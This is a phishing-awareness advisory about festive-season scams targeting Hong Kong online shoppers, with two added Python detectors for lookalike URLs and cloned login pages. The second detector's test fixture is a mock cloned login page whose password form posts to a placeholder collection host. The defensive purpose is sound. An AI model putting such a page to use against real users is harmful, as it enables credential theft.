Beware of Phishing Campaigns During Festive Season
The easing of quarantine and social distancing restrictions has enabled the normalisation of economic activities and international travel. Along with the upcoming Christmas and New Year long holidays, people will wish to travel abroad, consume gifts, and decorate for festive celebrations.
Attracted by the discounts on offer as well as the convenience, many people choose to do their festive shopping online. However, HKCERT has recently observed a number of phishing attacks targeting online shoppers. Since threat actors constantly update these attacks to maximise the number of victims, HKCERT has compiled this short piece on the tactics hackers use against online shoppers and the areas shoppers must pay attention to in order not to fall for these phishing scams.
Phishing Instant Messages
The recent trend in phishing campaigns began with the sending of shortened URL links to phishing sites via instant messaging platforms, including the smartphone's built-in messaging system and third-party messaging apps. As most of these messaging apps let a sender set a display name, threat actors can set the name to impersonate a legitimate brand. Below are some examples of instant messages from phishing campaigns.
Phishing Sites with URLs similar to Legitimate Sites
To trick targeted users into assuming a phishing site is legitimate and entering their information, threat actors register domain names similar to the brand's legitimate website. An example is shown below: whereas the legitimate domain name of Hong Kong Post is ‘hongkongpost.hk’, the threat actor hosted the phishing site under the domain name ‘hongkongpost[.]do’.
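The following is an added example, not code from the HKCERT advisory, showing how a helpdesk or SOC script can screen a URL pasted from an instant message before anyone opens it. It covers the three tells described in this piece: a shortened link whose destination is unknown until expanded, a lookalike domain that keeps the brand word but swaps the suffix (the advisory's hongkongpost.hk versus hongkongpost[.]do), and a brand name used as a subdomain of an unrelated domain; it also catches one- or two-character typosquats by edit distance. The brand allow-list, the two-level suffix list, the shortener list and every sample URL other than hongkongpost.hk and hongkongpost[.]do are constructed for illustration; a real deployment would use the full Public Suffix List instead of the hand-picked suffixes.

```python
"""Screen a URL from an instant message against known brand domains.

Added example, not code from the HKCERT advisory. The brand list, suffix
list, shortener list and the sample URLs (other than hongkongpost.hk and
hongkongpost[.]do, which the advisory names) are constructed.
"""
from urllib.parse import urlsplit

# Registrable domains of the brands we want to protect (constructed allow-list).
KNOWN_BRANDS = {"hongkongpost.hk", "hktvmall.com"}
# Hand-picked two-level public suffixes; use the Public Suffix List in
# production (assumption for this example).
TWO_LEVEL_SUFFIXES = {"com.hk", "org.hk", "gov.hk", "edu.hk", "co.uk"}
# Public URL shorteners: the destination cannot be judged until expanded.
SHORTENERS = {"bit.ly", "t.co", "tinyurl.com"}


def refang(url):
    """Undo the usual defanging so a reported URL can be parsed."""
    return url.replace("[.]", ".").replace("hxxp", "http")


def registrable_domain(host):
    """Strip subdomains: 'www.a.com.hk' -> 'a.com.hk', 'x.y.org' -> 'y.org'."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and ".".join(labels[-2:]) in TWO_LEVEL_SUFFIXES:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def brand_label(domain):
    """The label carrying the brand name: 'hongkongpost.hk' -> 'hongkongpost'."""
    return domain.split(".")[0]


def levenshtein(a, b):
    """Edit distance, used to catch one- or two-character typosquats."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def screen_url(url):
    """Classify a URL as legitimate, shortened, lookalike-tld, typosquat,
    brand-in-subdomain or unknown, relative to KNOWN_BRANDS."""
    clean = refang(url.strip())
    if "://" not in clean:
        clean = "http://" + clean
    parts = urlsplit(clean)
    host = (parts.hostname or "").lower()
    domain = registrable_domain(host)
    result = {"host": host, "domain": domain, "https": parts.scheme == "https",
              "brand": None, "verdict": "unknown"}
    if domain in KNOWN_BRANDS:
        result.update(brand=domain, verdict="legitimate")
        return result
    if domain in SHORTENERS:
        result["verdict"] = "shortened"
        return result
    label = brand_label(domain)
    for brand in sorted(KNOWN_BRANDS):
        # Same brand word, different suffix: hongkongpost.hk vs hongkongpost.do
        if brand_label(brand) == label:
            result.update(brand=brand, verdict="lookalike-tld")
            return result
    for brand in sorted(KNOWN_BRANDS):
        # Small edit distance from the brand word: hongkongpst.hk, hktvmal1.com
        if levenshtein(brand_label(brand), label) <= 2:
            result.update(brand=brand, verdict="typosquat")
            return result
    for brand in sorted(KNOWN_BRANDS):
        # Real brand domain placed in front of an unrelated registrable domain
        if (brand + ".") in host:
            result.update(brand=brand, verdict="brand-in-subdomain")
            return result
    return result


if __name__ == "__main__":
    for sample in ("https://www.hongkongpost.hk/track", "hongkongpost[.]do",
                   "http://hongkongpst.hk/", "https://bit.ly/abc123",
                   "https://hongkongpost.hk.parcel-example.com/login"):
        print(sample, "->", screen_url(sample)["verdict"])
```

The verdict order matters: an exact allow-list hit wins, then the shortener check, then the cheap label comparison before the edit-distance loop, so a legitimate subdomain such as www.hongkongpost.hk is never reported as a typosquat. The `https` field is returned alongside the verdict because, as the tips below note, a plaintext site is a separate reason not to enter sensitive data.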
Phishing Sites with Replication of Legitimate Sites
Besides using a domain name and URL that resemble those of a legitimate website, threat actors have recently been replicating parts of legitimate websites, such as the login pages. Since this technique reduces the effort of designing a new web interface for the phishing site, the threat actors usually change only the backend of the copied page to fit their needs. This makes it harder for users to verify whether the page they are browsing is legitimate.
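Because a cloned page keeps the legitimate site's look while its backend is swapped, the tell is usually in the markup rather than on screen. The following added example (not code from the HKCERT advisory) scans a saved HTML page for two such indicators: a form containing a password field whose action submits to a host other than the page's own, and stylesheets, scripts or images still loaded from a different host, which is what a copy-and-paste of the original page tends to leave behind. The sample HTML is constructed; hongkongpost.do is the phishing domain named in this advisory, and collect.example.net is a placeholder for wherever the copied form has been pointed.

```python
"""Flag cloned login pages whose form posts credentials to another host.

Added example, not code from the HKCERT advisory. The sample HTML is
constructed; hongkongpost.do is the phishing domain named in the
advisory and collect.example.net is a placeholder collection host.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class _LoginPageScanner(HTMLParser):
    """Collect forms that carry a password field but submit to another
    host, and assets (script/img/link) loaded from hosts other than the
    page's own. A copied page often keeps the original site's asset URLs."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.page_host = (urlsplit(page_url).hostname or "").lower()
        self.foreign_credential_forms = []
        self.foreign_asset_hosts = set()
        self._form_action = None
        self._form_has_password = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "form":
            # An empty or relative action resolves against the page URL.
            self._form_action = urljoin(self.page_url, a.get("action", ""))
            self._form_has_password = False
        elif tag == "input" and a.get("type", "").lower() == "password":
            self._form_has_password = True
        elif tag in ("script", "img", "link"):
            src = a.get("src") or a.get("href")
            if src:
                host = (urlsplit(urljoin(self.page_url, src)).hostname or "").lower()
                if host and host != self.page_host:
                    self.foreign_asset_hosts.add(host)

    def handle_endtag(self, tag):
        if tag == "form" and self._form_action is not None:
            action_host = (urlsplit(self._form_action).hostname or "").lower()
            if self._form_has_password and action_host != self.page_host:
                self.foreign_credential_forms.append(self._form_action)
            self._form_action = None


def scan_login_page(html, page_url):
    """Return the indicators found in one HTML document served at page_url."""
    scanner = _LoginPageScanner(page_url)
    scanner.feed(html)
    scanner.close()
    return {
        "foreign_credential_forms": scanner.foreign_credential_forms,
        "foreign_asset_hosts": sorted(scanner.foreign_asset_hosts),
        "suspicious": bool(scanner.foreign_credential_forms),
    }


# Constructed sample: a copied login page served from the phishing domain.
CLONED_PAGE = """
<html><head>
<link rel="stylesheet" href="https://www.hongkongpost.hk/static/site.css">
<script src="https://www.hongkongpost.hk/static/app.js"></script>
</head><body>
<form action="https://collect.example.net/save.php" method="post">
  <input type="text" name="user">
  <input type="password" name="pass">
  <input type="submit" value="Login">
</form>
<form action="/search"><input type="text" name="q"></form>
</body></html>
"""

# Constructed sample: a login form that posts back to its own host.
SELF_HOSTED_PAGE = """
<form action="/login" method="post">
  <input type="password" name="pass">
</form>
"""

if __name__ == "__main__":
    print(scan_login_page(CLONED_PAGE, "https://hongkongpost.do/login"))
    print(scan_login_page(SELF_HOSTED_PAGE, "https://shop.example.com/login"))
```

Only forms that contain a password field are reported, so a site search box posting to a separate search host does not raise a false alarm, and a login form with a relative action is treated as same-host. Foreign asset hosts are reported but not used for the verdict on their own, since legitimate sites also load assets from CDNs; they are most useful when the foreign host is the brand being impersonated.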
Phishing Page in Social Media Platform
As the public widely uses social media platforms such as Facebook and Instagram, some threat actors create fake pages on these platforms. Most of them publish updates about a discount campaign with an attached URL link directing to the phishing site. The first image is a Facebook page of HKTVmall created by a threat actor, designed to look like the legitimate HKTVmall Facebook page. The second image is the genuine Facebook page of HKTVmall, which is verified by Facebook with the blue badge.
Tips for Safe Online Shopping
- Don't click on links or attachments from an unknown sender. Always enter the URL of the online shopping platform directly in your browser or use bookmarks. Check the legitimacy of links and emails, for example by looking for spelling or grammatical errors in the URL and checking whether the sender is trustworthy. If the website does not use HTTPS encryption, be careful and do not provide sensitive information;
- Change the account password of the online shopping platform regularly. Use different passwords for different accounts to prevent a cascading impact if one of them is compromised;
- Enable multi-factor authentication to enhance account security;
- Place orders or check order status from the official website or mobile app only;
- If you receive a suspicious email or instant message, please verify the details at official channels. Do not provide sensitive information to an unknown sender;
- Check your online payment records regularly for suspicious transactions;
- Verify the social media page of an online shop using the platform's verification badge (such as the blue badge on Facebook and Instagram);
- Enable the anti-phishing feature in web browsers to help block phishing attacks; and
- Use the free search engine “Scameter” on Cyberdefender.hk to identify frauds and online pitfalls by checking an email address, URL or IP address, etc.
Tips for Organisations Before and During Holiday
- Prepare and plan for cyber security incident response according to the Incident Response Guideline for SMEs;
- Ensure the backup system is working properly and an offline backup has been set up. Refer to HKCERT’s Fight Ransomware page to learn more about ransomware;
- Leverage the Open Threat Intelligence Campaign to enhance cyber security defence capabilities;
- Build up protection against malicious scanning attacks; and
- Adopt Zero Trust architecture in the IT environment.